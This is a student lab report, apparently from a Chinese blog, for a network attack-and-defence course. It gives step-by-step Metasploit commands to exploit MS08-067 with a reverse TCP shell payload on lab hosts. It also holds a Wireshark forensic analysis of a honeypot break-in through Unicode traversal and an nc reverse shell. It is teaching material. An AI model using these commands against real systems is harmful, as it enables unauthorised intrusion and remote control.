20222922 2022-2023-2 《网络攻防实践》第六周作业

实验要求

(1)动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

(2)取证分析实践:解码一次成功的NT系统破解攻击。

来自192.168.200.4的攻击者成功攻陷了一台由rfp部署的蜜罐主机192.168.200.5,(主机名为Win2kServer_SP0_target),要求提取并分析攻击的全部过程。

  • 攻击者使用了什么破解工具进行攻击
  • 攻击者如何使用这个破解工具进入并控制了系统
  • 攻击者获得系统访问权限后做了什么 我们如何防止这样的攻击
  • 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

(3)团队对抗实践:windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

实验过程

动手实践Metasploit windows attacker

启动msf

msfconsole

在这里插入图片描述
使用ms08_067漏洞攻击模块

use exploit/windows/smb/ms08_067_netapi

在这里插入图片描述
设置打开反向连接的载荷

set PAYLOAD generic/shell_reverse_tcp

在这里插入图片描述
看一下需要设置哪些参数

show options

在这里插入图片描述
设置攻击的RHOST以及反向连接的监听ip LHOST。

set RHOST 192.168.200.5
set LHOST 192.168.200.4

在这里插入图片描述

设置TARGET为0会自动识别靶机系统,输入exploit进行攻击

set TARGET 0
exploit

在这里插入图片描述
攻击成功

取证分析实践:解码一次成功的NT系统破解攻击

下载文件后用wireshark打开,通过观察数据包的流向可以知道213.116.251.162为攻击者,172.16.1.106为靶机,我们以这两个ip为条件筛选一下。

ip.addr==213.116.251.162 && ip.addr==172.16.1.106

在这里插入图片描述
这里面http的流量很多,先追踪http流看看
在这里插入图片描述
在111流中,可以看到攻击者已经可以远程读取靶机信息了。
在这里插入图片描述
这里的流量,这不就是Unicode漏洞攻击么,Unicode漏洞是攻击者可通过IE浏览器远程运行被攻击计算机的cmd.exe文件,从而使该计算机的文件暴露,且可随意执行和更改文件的漏洞。这里是利用sql的方式去触发Unicode漏洞
在这里插入图片描述
可以在后面的流中看到攻击者利用漏洞做了什么操作
在这里插入图片描述
在这里插入图片描述
后面的流换了一种方式,%c0%af = /是任意文件读取漏洞,不过执行的操作好像和前面差不多
在这里插入图片描述
在这里插入图片描述
看这个流程应该是利用sql注入、文件任意读取漏洞去执行cmd,通过nc反向回连获得shell。
后面就是把各种信息填入对应的txt中

在这里插入图片描述
接着就是一些提权操作了,比如说把自己的账户填进用户组中
在这里插入图片描述
这里可以看到访问者连接到6868端口并获得了权限
在这里插入图片描述
从这已经可以看出攻击者知道是蜜罐主机了
在这里插入图片描述

团队对抗实践:windows系统远程渗透攻击和分析

本次攻防实践和20222934xzl同学一起进行,相关主机均设置为桥接模式,并连接在同一个局域网之下,以模拟实际情况,相关IP地址如下:
对方ip为192.168.249.166
我方ip为192.168.249.165
作为攻击方,攻击机IP为192.168.249.165,首先测试与目标主机的连通性,没有问题:
在这里插入图片描述
之后按照实验1的步骤,加载漏洞模块、设置负载、源IP、目的IP,然后发起进攻:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
攻击成功后,查看了靶机IP地址,然后创建了一个名为naf文件夹以简单“告知”xzl。
在这里插入图片描述

遇到的问题

实验一攻击不成功
解决方案:将网段置于一个同一网段即可攻击

实践总结

本次实验动手实践了使用msf渗透主机的过程,了解了这个工具的使用,也仔细分析了一次成功的NT系统破解攻击,帮助自己理解了攻击过程。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值